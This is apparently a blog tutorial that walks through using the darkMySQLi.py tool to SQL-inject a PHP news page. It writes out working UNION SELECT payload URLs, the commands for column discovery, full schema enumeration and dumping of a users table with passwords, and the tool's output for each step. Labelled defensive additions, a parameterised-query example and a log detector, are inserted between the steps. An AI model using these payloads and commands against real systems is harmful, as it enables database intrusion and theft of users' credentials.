I would like to share with you darkMySQLi.py, a multi-purpose MySQL injection tool developed by rsauron (rsauron@gmail.com), a member of the darkc0de crew (www.darkc0de.com). This Python script automates about 80% of the search for, and exploitation of, SQL injection. I have been using this tool since February 2009 and I can say that it will help you and reduce the time needed to find blind SQL injection or SQL injection during web application penetration testing. It is especially useful for IT security consultants and others involved in penetration testing, because it saves time when looking for MySQL injection vulnerabilities.
Today I will show you how to use darkMySQLi.py through to a successful compromise of a MySQL database server. If you search Google for "darkMySQLi.py", you will find many articles and links about this tool; refer to those for further explanation and to download the tool. With this tool it is very easy to find a MySQL injection vulnerability, and the hands-on part of a web assessment takes only 2-3 minutes, which leaves much more time to verify the findings and to research the solutions that prevent SQL injection.
Before you start using darkMySQLi.py, you need to find a vulnerable website or link where malicious code or characters can be injected into a vulnerable parameter. In the example below, the id parameter is vulnerable: character strings such as +, -, ", ', <>, %, ;, () and & can be inserted into it. The vulnerability exists because the programmer or webmaster did not sanitize user input and filter it properly. When you insert characters, numbers or code into the vulnerable parameter, MySQL syntax errors appear.
Targeted URL: http://192.168.2.10/news/popup_news.php?id="22
For the targeted URL above, when I put a " character in front of the value 22 of the id parameter on the popup_news.php page, it shows this MySQL syntax error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/johncrackernet/www/htdocs/functions.php on line 114.
From this error you can see that the id parameter, at the value 22, is vulnerable, which allows a SQL injection attack against this website.
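The root cause described above, request input concatenated straight into a query, and its fix can be shown side by side. The following is an added example, not code from the original post or from the site being tested: it uses Python with an in-memory sqlite3 database (an assumption standing in for the MySQL news table, since the PHP source is not on the page) and contrasts the concatenation pattern behind popup_news.php?id=... with a version that allow-lists id as a positive integer and binds it as a query parameter.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the site's news table (sqlite3 instead of MySQL so it runs offline)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(21, "Older item", "constructed body"), (22, "Item 22", "constructed body")],
    )
    conn.commit()
    return conn


def lookup_news_unsafe(conn, raw_id):
    """The pattern behind popup_news.php?id=...: request input pasted straight into SQL.
    A stray quote breaks the statement (the error the post shows), and any SQL appended
    to the value is executed as part of the query."""
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


# Allow-list: the id parameter is only ever a positive integer, so accept nothing else.
ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def lookup_news_safe(conn, raw_id):
    """Hardened lookup: validate the shape of the input, then bind it as a value.
    The database driver never sees the user's text as SQL."""
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title FROM news WHERE id=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def probe(raw_id):
    """Run the same input through both lookups; return (unsafe_outcome, safe_outcome)."""
    conn = make_db()
    try:
        unsafe = "rows=%d" % len(lookup_news_unsafe(conn, raw_id))
    except sqlite3.Error as exc:
        unsafe = "SQL error: " + type(exc).__name__
    try:
        safe = "rows=%d" % len(lookup_news_safe(conn, raw_id))
    except ValueError:
        safe = "rejected"
    return unsafe, safe


if __name__ == "__main__":
    # "22" is the normal request; '"22' is the post's probe; "22 AND 1=2" is the
    # condition darkMySQLi prepends to its payloads (it empties the legitimate result).
    for raw in ("22", '"22', "22 AND 1=2"):
        print(repr(raw), "->", probe(raw))
```

The unsafe lookup returns a driver error for the quote (the sqlite3 equivalent of the mysql_fetch_row() warning above) and silently evaluates appended SQL; the hardened one rejects both before any query is built, and the bound parameter would keep even a well-formed injection from being interpreted as SQL.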
Step 1: Finding number of columns in MySQL Database
To perform the SQL injection attack, I used darkMySQLi.py against the targeted URL above. You must understand how to use the darkMySQLi.py tool. If you do not, refer to the built-in help menu (run darkMySQLi.py -h to see it):
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -h
darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,opt: -T) MySQL v5
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req:-T,opt:-D,-C,--start MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
Use this command to find the number of columns in the database:
./darkMySQLi.py -u "URL" --findcol
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -u "http://192.168.2.10/news/popup_news.php?id=22" --findcol
|-------------------------------------------------- |
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
|Multi Purpose MySQL Injection Tool|
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22
[+] 06:28:14
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1, 2,3,4,5,6,7,8,9,10,
[+] Column Length is: 10
[+] Found null column at column #: 3,4,7,8,
[!] SQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
[!] darkMySQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--
[-] 06:28:23
[-] Total URL Requests: 10
[-] Done
Don't forget to check darkMySQLi.log
From the test result above, I found a total of 10 columns in the query, and columns 3, 4, 7 and 8 are null columns. From the SQL server's perspective a NULL is not a value; it only means that no value was supplied when the row was created. These null columns give the attacker a place to test SQL injection. The results show both the SQLi URL and the darkMySQLi URL. In the Python script, the darkc0de placeholder marks where the tool concatenates the strings it wants to read back using the MySQL CONCAT function, tests hashes from the database, generates hex representations of strings and performs other functions. From the darkMySQLi URL you can see that darkc0de is placed in the null columns, numbers 3, 4, 7 and 8, where the SQL injection is tested.
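The probe and marker URLs the tool prints above (the incremental UNION SELECT 1,2,...,N requests and the darkc0de placeholders) are exactly what lands in the web server's access log during a run, so they are a useful detection hook for the defending side. The following is an added example, not part of the original post or of the darkMySQLi project: it parses constructed Apache combined-format log lines (the source address is the proxy shown in the tool output, since the requests were relayed through it), decodes the query string including the "+", "%20" and "/**/" spellings that the --end option chooses between, flags UNION SELECT requests and the marker string, and counts how many distinct column counts each source tried, which is the signature of the --findcol step.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not from the post). The request paths mirror
# the probe and marker URLs darkMySQLi printed above; the last two lines are benign.
SAMPLE_LOG = """\
192.168.2.2 - - [12/Mar/2009:06:28:14 +0800] "GET /news/popup_news.php?id=22 HTTP/1.1" 200 3120 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
192.168.2.2 - - [12/Mar/2009:06:28:15 +0800] "GET /news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1-- HTTP/1.1" 200 2981 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
192.168.2.2 - - [12/Mar/2009:06:28:16 +0800] "GET /news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2-- HTTP/1.1" 200 2981 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
192.168.2.2 - - [12/Mar/2009:06:28:17 +0800] "GET /news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,3-- HTTP/1.1" 200 2981 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
192.168.2.2 - - [12/Mar/2009:06:28:23 +0800] "GET /news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10-- HTTP/1.1" 200 3377 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
192.168.2.2 - - [12/Mar/2009:06:29:13 +0800] "GET /news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10-- HTTP/1.1" 200 4410 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
192.168.2.2 - - [12/Mar/2009:06:29:14 +0800] "GET /news/popup_news.php?id=22%20AND%201=2%20UNION/**/SELECT%201,2/* HTTP/1.1" 200 2981 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
10.0.0.5 - - [12/Mar/2009:06:30:01 +0800] "GET /news/popup_news.php?id=23 HTTP/1.1" 200 3088 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [12/Mar/2009:06:30:05 +0800] "GET /search.php?q=union+station HTTP/1.1" 200 1902 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# UNION ... SELECT with any whitespace between the keywords (after decoding and
# comment-stripping, "+", "%20" and "/**/" all become a single space).
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# Placeholder string the tool substitutes into the readable columns.
MARKER_RE = re.compile(r"darkc0de", re.I)
# "SELECT 1,2,...,N" followed by the "--" or "/*" terminator: one column-length probe.
PROBE_RE = re.compile(r"\bselect\s+((?:\d+\s*,\s*)*\d+)\s*(?:--|/\*|$)", re.I)


def normalize(path):
    """Decode the request path the way the application's SQL layer effectively sees it."""
    decoded = unquote_plus(path)            # "+" and "%20" -> space, other %XX -> byte
    decoded = decoded.replace("/**/", " ")  # inline-comment whitespace evasion
    return re.sub(r"\s+", " ", decoded)


def analyze(log_text):
    """Return (findings, column_probes): flagged requests and, per source address,
    how many distinct column counts were tried in UNION SELECT probes."""
    findings = []
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format requests
        rec = m.groupdict()
        path = normalize(rec["path"])
        reasons = []
        if UNION_SELECT_RE.search(path):
            reasons.append("union-select")
            pm = PROBE_RE.search(path)
            if pm:
                probes[rec["ip"]].add(pm.group(1).count(",") + 1)
        if MARKER_RE.search(path):
            reasons.append("darkc0de-marker")
        if reasons:
            findings.append((rec["ip"], rec["ts"], "+".join(reasons), path))
    column_probes = {ip: len(counts) for ip, counts in probes.items()}
    return findings, column_probes


if __name__ == "__main__":
    found, probe_counts = analyze(SAMPLE_LOG)
    for ip, ts, why, path in found:
        print(f"{ip} {ts} [{why}] {path}")
    for ip, n in probe_counts.items():
        print(f"{ip}: {n} distinct column-count probes (column-length enumeration)")
```

Decoding before matching is what makes the "/**/" and "%20" variants fall into the same rule as the plain "+" form, and the word-boundary pattern keeps an ordinary search for "union station" out of the findings. Because the tool relays through the proxy listed in its banner, the address you see is the proxy's, so correlate with the proxy's own logs before attributing the source.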
Step 2: Enumerate all information in MySQL Database
In the first step I gathered the number of columns: 10, of which 4 are null columns that can be exploited with SQL injection. Through the darkc0de placeholder strings, the tool concatenates as much information as it can into those null columns using MySQL CONCAT. In this step the darkMySQLi URL is used to enumerate all of the information in the database, replacing the URL tested in the first step.
Use this command to gather all of the information that can be obtained from the database:
./darkMySQLi.py -u "darkMySQLi URL" --full
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -u "http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--" --full
|-------------------------------------------------- |
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| Multi Purpose MySQLInjection Tool|
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 06:29:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: dbtraffic
User: johncrackernet@www.crackernet.org
Version: 5.0.45-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 270
[Database]: dbtraffic
[Table: Columns]
[1]TRA_REG: id,tra_name,tra_lastname,tra_address,tra_passport,tra_state
[2]TRA_Events: events_id, events_title, events_url, events_desc, events_sched, events_status
[3]TRA_code: code,item,adl,ingred
[4]banner_ach: id,id_uname,image,impressions,clicks,url
[5]cal_file: id,page_main,filename,code
[6]cal_msg: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[7]cal_msg_backup: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[8]cal_name: id,name
[9]cal_users: uid,username,password,fname,lname,userlevel,email
[10]cal_memo: id,memo
[-] 06:35:12
[-] Total URL Requests: 25
[-] Done
The results above show that darkMySQLi.py worked: it enumerated the database name, version, tables, columns and row counts. Among the tables and columns gathered, some data is valuable and confidential. An attacker will normally look for valuable data such as usernames, passwords, credit card numbers or PayPal accounts, and will try to dump that data to get complete details from the servers or machines they have compromised.
Step 3: Dumping the data from MySQL Database Table
In this step I want to dump the MySQL table that contains usernames and passwords, because all of this data can be considered valuable and confidential.
Use this command to dump the chosen columns of a table from the database:
./darkMySQLi.py -u "darkMySQLi URL" --dump -D "Database name" -T "Table name" -C "Column"
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -u "http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--" --dump -D dbtraffic -T cal_users -C uid,username,password,fname,lname,userlevel,email
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 07:00:41
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Building Proxy List...
Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: dbtraffic
User: johncrackernet@www.crackernet.org
Version: 5.0.45-log
[+] Dumping data from database "dbtraffic" Table "cal_users"
[+] and Column(s) ['uid', 'username', 'password', 'fname', 'lname', 'userlevel', 'email']
[+] Number of Rows: 1
[1] 1:admin:password:default:user:2:
[-] 07:00:44
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log
The results above show that I could gather the id, username, password, full name, email and user level from entry number 9 of the enumeration above (the cal_users table), which I dumped from the MySQL database.
In conclusion, darkMySQLi.py is very useful, especially for IT security consultants, because it saves a lot of time during penetration testing and produces better-quality findings.
2 comments:
How do I use that tool, sir? I need info.
Very helpful post, thank you very much.
Only problem is that I would like to see what's 'behind the scenes', what exactly are the strings it sends.
I see only the results.
Any idea about that?
Thank you again, very high quality post.